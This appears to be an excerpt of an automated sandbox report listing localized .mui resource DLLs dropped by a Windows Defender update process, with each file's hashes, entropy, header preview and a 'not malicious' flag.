File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.053464831489175
Encrypted:	false
SSDEEP:	384:dYNWgEFJeJzVMV9dje/vOXg5O25RCvDdWSa/WwDBRJQ3M8M8/fi/GR9zusl4qzm:yrvOQ5O25Rjx1P+MufiC9zuu6
MD5:	FCE35F43E1CA711D8D70FAE0B8E17AB6
SHA1:	F2015D6186C32133B2B6FCBFFC54A4F9989629C5
SHA-256:	B011ED993511C65C0D1000D4D5FDDEF78736D4173EF1644344D9F67CFB6A17DF
SHA-512:	1BD45D27BE226BE284A26AF86CE74D62E2F1CEA0C19A0B7A18784D562BFACAC58129681B0C5F6E002752893A1AF83159E5C03FC3FA51AF96D96E7CE8EC87EA8C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X.......................................................y....@.......................................... ..PT...........Z...%...........................................................................................rdata..............................@..@.rsrc...PT... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..hO...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ja-JP\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	41736
Entropy (8bit):	6.007039937615529
Encrypted:	false
SSDEEP:	768:4si6wGkwuPLiN4QB+OGgGEUdZCCC22oy+I1PqW50Zi9zui/w:perlQB+Or4CCC/oLQPqKzui/w
MD5:	FF68B65F0D4E0703539BA1AFD076EF92
SHA1:	3EC478B4AD0F2C81D1D649A441FCE6CB3D78E140
SHA-256:	7627A456B25F332E2F277029334D89516209E8ADFCB46FEF1EBF730B83B50FDE
SHA-512:	0AD0627016690820943C4427D45367C27B3AFAA89F5A3FF08DEAA5B723A57F103DC94EBEEA9BD8881EA69AEDBD4076DDD934A4C0CC20E2CBC97F5E87DFEBE9EC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........\|......................................................^.....@.......................................... ...y...........~...%..............8............................................................................rdata..............................@..@.rsrc........ ...z..................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ja-JP\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	41224
Entropy (8bit):	5.793167934556737
Encrypted:	false
SSDEEP:	768:knJjwzKjB4GiEOlfrT+VRSJ1Pzn6K9zuu:knaK2E8frT+7SvPznXzuu
MD5:	6D90D31A70832ACE611AF055C0FED83A
SHA1:	2C858AA0CCB4DF65C7FC3BEF8EB8D7B6708B05F8
SHA-256:	B411B0C40C78DF24A692EF980EB3A5023CB15DDC0213A90294B04FF038E178D8
SHA-512:	2271053E733DDF98F7E78D0A6C3D93DB0C821A5DF8B8FAD673A087CABF304EDDE884CBED771D3906D59E807A51CE3691556ECF03BACCC977F7DBC4102DB5CE96
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........z...........................................................@.......................................... ...v...........\|...%..............8............................................................................rdata..............................@..@.rsrc........ ...x..................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ja-JP\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56592
Entropy (8bit):	4.820772737931722
Encrypted:	false
SSDEEP:	768:U4p3beEN8GzUT9kXSEjpbQ7n2qXvQ6KxxhSt1PyXzg9zR6:Hp3irSXS5vXheSbPyDozU
MD5:	ACFA8392E72737D46831D9E81D5E1F20
SHA1:	0FC9A631AAEEFB018E1100F95C53294E1A4A35E4
SHA-256:	09A108623648C90D8F8A4FF590E554B6909FBC2880AC31C014505A436970978D
SHA-512:	BFC37BECC179F9F7E9D2B09B13A56D6B4FCCB903B753E5D1D6DC8F41B88BBE1052B8B4A206F9202B54B3B02D6620168AA08B7C5C2AA8C6B70A58C93FBBA01105
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................+.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ja-JP\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22280
Entropy (8bit):	6.421014841164131
Encrypted:	false
SSDEEP:	384:3dmKn0wvIOlCT4FUQHG0PWW3WAZhP5n3WSa/WfDBRJ3Ry50ZSxR9zus2+OkY:5CT4FUQHfGAZhPQ+1P3U50Zi9zuiOkY
MD5:	6ABDF4005201A1C3523AC7894597E4CE
SHA1:	556DC2D0F2EB70C19B68BCA45681700BA9A7B55E
SHA-256:	4350BB7B8280C078E34C01CEBDA8207DD3C169B780D2B0A07F0FF6D57B0C6823
SHA-512:	BC68C692D7B0F44ADDB26C698BDDD55B5EEB496CED5EE4EA5C70681CA2F9AA0BF824107F8CCB309B5505EA7D2A7719827973C322DF152EC2CAFADD9D08702242
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........0...............................................P....../.....@.......................................... ...-...........2...%...........................................................................................rdata..............................@..@.rsrc....-... ......................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...(...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ka-GE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32016
Entropy (8bit):	5.6148274330371635
Encrypted:	false
SSDEEP:	384:k1wSeZZh3SVtJDzWSa/WVHDBRJ+bTKAR9zbk8X:F0ig1P+b289zH
MD5:	20ADD0DC75903003E60674C4A081EC91
SHA1:	58F1A6FD3D13F35E7CD399536B77C4929B9AC4E9
SHA-256:	D269C5D76A49B96C1773892FD6BC31F49362FFA7DC5CA06FC372222C3E5826C6
SHA-512:	3F3B822B1FA5A1A185F8714C56182873C1FBF8715FF7A444754AF8E457B18C2D4F9D14CE1B4D1DE7D72BBF71A79BF4B85CE4ADC8620BA22CFD87E1DE733C5736
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V............................................................@.......................................... ..`R...........X...%...........................................................................................rdata..............................@..@.rsrc...`R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...M...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\kk-KZ\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.5316028402964665
Encrypted:	false
SSDEEP:	384:UOtn28JA8D6lOaGAPwBL+xAWSa/WbDBRJ55SHk5+R9zusyPxFHE:vtqwd+9C1P5YEg9zuXjk
MD5:	113D969FFA05B57F2F0925CC5168DF5C
SHA1:	7BC228E58E8B0FC0CF0890961D11AE8D9F19CEB0
SHA-256:	4C3A79637E1579019BB2544AF9C5B35E30B1C12A8074D6258AF5879B66D40E96
SHA-512:	E756FEA201E6F8BACCB8B8086D736C0E989FEE50286E9A553C86E01D0E4912B0B1B68C65C943EA57BDA5433CBE114C6749FB493FCEC37188ED3CBAEB8F444C06
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V............................................................@.......................................... ...S...........X...%...........................................................................................rdata..............................@..@.rsrc....S... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%.. N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\km-KH\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31504
Entropy (8bit):	5.815033294392865
Encrypted:	false
SSDEEP:	384:5/+EQE9EG3zkKMYsI3m3ukDgfdjN3FpYcY+FgKYh15+WSa/WDDBRJ9TN4tgR9zvt:x+5kH2YDL3jYcY+FgKYh1HK1P9TNx9zV
MD5:	8F7B8BB5C01E3E580168151C63096A80
SHA1:	6590255CB3467E4806253C45988A57D719F56D5C
SHA-256:	A6339AA5CB698C4C586EBD3CF3C99441A8B3344B2EE5262ED0C652AFD4AF8016
SHA-512:	6F4B83B2E4C4B352275B68643D82BA36C92E3F96547F67EE20B61D7EC78D8E14804D5B5F4AD9B8D3B62D94F24D2A9D06995E9E2F9B6D87007A8747FD15487DC6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T............................................................@.......................................... ...P...........V...%...........................................................................................rdata..............................@..@.rsrc....P... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...K...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\kn-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32528
Entropy (8bit):	5.6732613796953055
Encrypted:	false
SSDEEP:	384:DUgxwiN2Dg1YcKP+0r0bk2NwpXpD4WSa/WrDBRJo1WF//dJR9z3oe:OiN2Dg1YbPwwpXVPS1P6WF//dj9zf
MD5:	B973B01EA405ECCD8E9D1719E41F4D67
SHA1:	E8341CCCF4F6C8406FF7F0E71FE5E1A95D05074D
SHA-256:	3AF2FF4D7962C01C8D21B5DF12D43EE8B334AFBAAD9EF8D475D268671B238C86
SHA-512:	C1BCA548E75EA7B467E84DAEA7C07FE7A71CFB0DE5489A2CE03786012885641CFC05F6A7AEAFF21E8CAB8BBB2A0EB0525BD950D44B2EF5F6A9F723853A3BD05B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X......................................................N.....@.......................................... ..\T...........Z...%...........................................................................................rdata..............................@..@.rsrc...\T... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ko-KR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	41224
Entropy (8bit):	6.244567069616056
Encrypted:	false
SSDEEP:	384:dWpHQFQDBFgM5WfAs1GFXCCma5mxFygF4kTgzVKxqmBmowmSvBnDJJvheWwQWPDL:IpDAcQErnvZw11PoRmuU9zuU
MD5:	1A3902E827E3A22B00A6C3606E0B5448
SHA1:	B0F14053CB6ED9205857CFBD9CBC83C358BCAA6A
SHA-256:	EAEAA0D3A29A9EABD5B4AB1AC316026C3A5C96F90D7A974FF1D83083BCA073D7
SHA-512:	EBD0DA8AB9C53771E6D51E124B7AE15F4C716D6BBEBE2E934D2F7B725B76B51D079DCE8E5FD4659FB7C3EC20396C71586F7AA8C0E8EEC7F644B1BDBCB1390770
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........z............................................................@.......................................... ...w...........\|...%..............8............................................................................rdata..............................@..@.rsrc........ ...x..................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ko-KR\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38672
Entropy (8bit):	5.931675636558472
Encrypted:	false
SSDEEP:	768:sy+v1UHzpq8F0zZTNyZ1CD+41PxCTNx9zI:shvWq8FwZTNyZ1CCAPmpzI
MD5:	D53BB3E4B08B121FB44D238945EF45C1
SHA1:	249B277CD2DB72194DC0E7366F43150AA2AB4B5D
SHA-256:	8931484BE8B7C9014A41B88F2357FC96A401B14BDCDCBAF71B2A09F54D0D3B6B
SHA-512:	C592391EA5E97AE3543984A369662C920400D83D194014ABD539153FA9B02DFCC8BBA3BA3EFFD8CA19E00D2414B9F82CB3F3B8A5673F8F4106DBA9A765ACFAC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........p.......................................................b....@.......................................... ..`l...........r...%..............8............................................................................rdata..............................@..@.rsrc....p... ...n..................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ko-KR\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56592
Entropy (8bit):	4.858489495880449
Encrypted:	false
SSDEEP:	768:IkXLWEK4h5r3zUkr/9Xmompbm+hPXiQeuU3A1PXy6Xzg9zry:Ik7WElfrFXmOeX9U34PXy6Doz+
MD5:	708181F34250B98B706D689A469B8DA7
SHA1:	FBA873E68E101C8B1E16584E58059E2A6B275E90
SHA-256:	3004BEB5DD7AA65A5A1CF2ABB955F481B638D79FCB88B547399BC36C0731EF39
SHA-512:	201E59CC0D2EC73387A9AC5C337C2A22867F1BD22D8599DB2EBEB4D35F0FF1643D2C4FABA57FDB9EB2D36066B73F94C4F4598F3A5EEC64DF62853A0EE28D435E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................S(....@.......................................... ..D................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ko-KR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22280
Entropy (8bit):	6.586530972126116
Encrypted:	false
SSDEEP:	384:OQOec89twlKPWthWSa/WqDBRJXRpUad+JR9zusN+S:rcEdH1PXkadk9zui
MD5:	807B1A67A42C056734EBCC124DD046AF
SHA1:	1F4B861919D0CCD729001A7F1293AE794478FE64
SHA-256:	E0A65FE97F6A1660CD4F78769EEED09A780797F616462FA4198BF0E7ABDEB586
SHA-512:	62D92F829B9E323194A5B9482DBB5C906C79504595224240690B3E573990758F43E8BFFD64D8F9B24C4984498623E82DD99C0BC3DD42417FF46B00606194ED51
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........0...............................................P............@.......................................... ..d-...........2...%...........................................................................................rdata..............................@..@.rsrc...d-... ......................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...(...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\kok-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.591533876780559
Encrypted:	false
SSDEEP:	384:lh0JoIN8XmCmBXstBsQOMpSosjyQdQde1wXzBuqHopXoc4H4aWvWSa/WQDBRJNoq:T27qXN1+L0Z1PkfWoF9zubN
MD5:	5D0D92E9BAD50DF97781391B4276D872
SHA1:	2D361E9974275CDA1B90A105F319083BEA84AE7F
SHA-256:	274DA5A43171E92DFDF2A4A398972A2F0D81B43FC5019601C6DCE679CDFD5EAE
SHA-512:	DF3332E3A239CCFE02070943E8CB1F6BEDE66DF3B951E1A466019748B9B410DD2C9A6B711945DE9214395F7E2CC490EFEC16D3E824EF08F6662C5B21C51BC9E3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T......................................................q.....@.......................................... ...P...........V...%...........................................................................................rdata..............................@..@.rsrc....P... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...K...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lb-LU\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33544
Entropy (8bit):	5.098502928370115
Encrypted:	false
SSDEEP:	768:1p55D8YqpQLHXSYTQkjBvznuebgu1PDTXed9zuzrJ:d5D8YqpQLHXSujBvznuebgWPDTO/zuz1
MD5:	DB99A39DB1F8B11724C3854F054D11BA
SHA1:	C0CFD4C21AC2175D8A00FF8429C56255827AFA91
SHA-256:	ECB9A6DF09288F8AF01A3A128072C15DDDC50E1A4D8628F36EC591543D25DDF8
SHA-512:	1FED6697CB709ED73384D182E81E9F3AFFC3E5C710EDB89242B9CAD9DB9F155B6F17E261FC5A2600797D6B73C8245D73A0B9567BB099530CEB1AD1B23D28B650
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........\............................................................@.......................................... ...X...........^...%...........................................................................................rdata..............................@..@.rsrc....X... ...Z..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..0S...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lo-LA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28944
Entropy (8bit):	5.852848861434648
Encrypted:	false
SSDEEP:	768:E22/StSLbPRKWBDsAKuoJZJu7VFAQs1PqWF//dj9zVC:LtSLbPPKuoJVQMPqWZzVC
MD5:	FD7DF1B50590D62548F544A49A4D2E68
SHA1:	6F1C569922A982BBCCEF6C2B1853AED4A75749EA
SHA-256:	D071987AFE5A575FFBB391ADE52CF759D7DA5132DD5184AE3CDEA8A193001E54
SHA-512:	F420EA83AE22FEE092C4721439B1A8C6C670D3A2BDC7046EEC8C9BE78BD46C75023E8591DB894A55B602D50D3D9399527C8B7627A555A67D05AAFD20785C0E91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........J...............................................p............@.......................................... ...G...........L...%...........................................................................................rdata..............................@..@.rsrc....G... ...H..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...B...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lt-LT\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66832
Entropy (8bit):	4.425487470988343
Encrypted:	false
SSDEEP:	1536:0pXl5a4QO3KGYQeAYzffpeAU2d+7gv7cGFnsW+d6b01nxth8M4qIfeg9yCUYPzpU:0pXl5a4QO3KGYQeAYzffpeAU2d+7gv78
MD5:	462A909EB60F799B4BDBE986E30BBBFD
SHA1:	E398553AD5229E46558121A1910A4D10D1A6AC52
SHA-256:	A2E77981862C9B4EE6C8AA1227D902C1EE1A88273713CD116153927A59F60593
SHA-512:	377AD4B3A179ED05DADD295B50E7C21344B6B9C523CAFFFFD8C4D28E9DBDF35DB0E14C4191B94F14EBC0E35AB045D43054AE8EF7822FE7629262B04465D939E4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..l................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lt-LT\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.229651126375463
Encrypted:	false
SSDEEP:	768:SeOR14Xx143OEuUFIF/+qgGvD+NS3sXOKG1PWQP9zuU+:wrePjzur
MD5:	17FB4FBDD603BB04B6C6AA230F6C3492
SHA1:	C880BF01D102D759ABD8BDB5ACDE481A630FF5EE
SHA-256:	E26571B65AF5B3B86795083C55829E34E71611EE8060C4BE6802534D7613A2F7
SHA-512:	56030471BDEDE2C3E9BF960D2E5A98A0DDBA7572C019594DEC9875E32E0B6E6A68E5A8AC0A4FBCCC1D8418A59606EB4CCED7040DA238871B74D12E3525F2ECC5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p...........@.......................................... ...N...........T...%...........................................................................................rdata..............................@..@.rsrc....N... ...P..................@..@.....*Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lv-LV\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66312
Entropy (8bit):	4.48661911407299
Encrypted:	false
SSDEEP:	384:OkIhLU5vzNlO5KdpTdQ8+2j6pFpiTfuOUj/KJo3TKBQjx5tE7G7yJgvkIyyyysWr:DGL5KnTzV5f4Ig1kA8sWm1Psged9zuzB
MD5:	377F50F2678E9B3B7FBACBBBC2F53417
SHA1:	D76D81AE954483AA7A31E3A6DE65F8F92CB75CC6
SHA-256:	926F8279730FE8865010EC3D53D3B75B023C4C5A3DA7F32E56E1D090318A7024
SHA-512:	3E06DE23AAAA2AFACF5BEC533605D0CAD17A0A9C994B294A8A8DC56E7046D5B78285DA54EBB25BC86783D91257B33300EB828F9160851F1F7710F5E6F7C8EDC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................i.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\lv-LV\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30472
Entropy (8bit):	5.259790137946076
Encrypted:	false
SSDEEP:	384:CL7j8DY41lCYPWSa/WEDBRJVXk5+R9zusyUcWh:4USf91PWg9zu9K
MD5:	7DA272CE86F63BE2E38B429645E9CEA3
SHA1:	ABB7A04710EA6EA7D780A1D5C2E68C235AF87C83
SHA-256:	D9A909FFF8115A6E773E9F7C637603E7582B70CFAA1CB49C80F2175CC2EFCB30
SHA-512:	AE526CAE81A4C71D4AB5C7D0FE06AA12861061070DEE3B9A8DF697F985B28A4DD7BA0CB66C9C7F81AC0F10A7F22840090308CC23522BB00993593EC8DF9FE532
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........P...............................................p.......>....@.......................................... ...M...........R...%...........................................................................................rdata..............................@..@.rsrc....M... ...N..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mi-NZ\mpuxagent.dll.mui

